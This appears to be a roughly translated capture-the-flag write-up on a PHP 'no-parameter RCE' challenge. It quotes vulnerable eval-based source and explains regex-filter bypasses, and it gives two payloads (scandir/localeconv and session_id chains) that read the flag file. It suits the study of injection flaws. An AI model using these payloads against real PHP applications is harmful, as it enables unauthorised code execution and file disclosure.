Test site:

git leak

No parameters rce

Start:

Use dirsearch to scan the flag and it should be read

Then use github to find the source code leak

";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("Almost!");}}else{die("Think about it!");}}else{die("I still want to read flag, stinky brother!");}}// highlight_file(__FILE__);?>

Using exp to pass parameters also has many filtering restrictions, can not read with pseudo-protocol, but also use regular matching

There is no parameter rce

First bypass the pseudo-protocol and then execute if ';' ===preg_replace

The (?R)? in the if represents the current expression, which is /[a-z,_]+((?R)?/), so it is a kind of recursion, ?Represents recursive current expression 1 or 0 times (if (?R)* represents recursive current expression 0 or more times, it can match a(b(c()d())))

There are three general bypassing postures for no-parameter RCE:

gettallheaders()

get_defined_vars()

      ·session_id()

Then some keywords are bypassed, and those with get functions cannot be used

There is also a scandir to scan files in the current directory

1.exp:

exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

The highlight_file() function performs syntax highlighting on files, this function is an alias of show_source()

Next() outputs the value of the current element and the next element in the array

The array_reverse() function returns the array in the reverse element order. (mainly can return values)

The scandir() function returns an array of files and directories in the specified directory

pos() outputs the value of the current element in the array

The localeconv() function returns an array containing local number and currency format information. The first element of the array is ".".

    is that the loacleconv function returns a .  and then pos will get the . Return to the payload we constructed and let scandir return the array in the current directory, which is the file in the current directory array_reverse() outputs in reverse order (the purpose is to output the queried content in positive order)Then next extract the second element (filter .) and finally display the flag with hightlight_file()

2.exp:

?exp=highlight_file(session_id(session_start()));

The above regular filter does not filter out session_id()

We can use session_id to get flag

You also need to use session_start() to start a session when you are using it because php does not actively use session by default

session_id() can get the current session id.

It's ready to go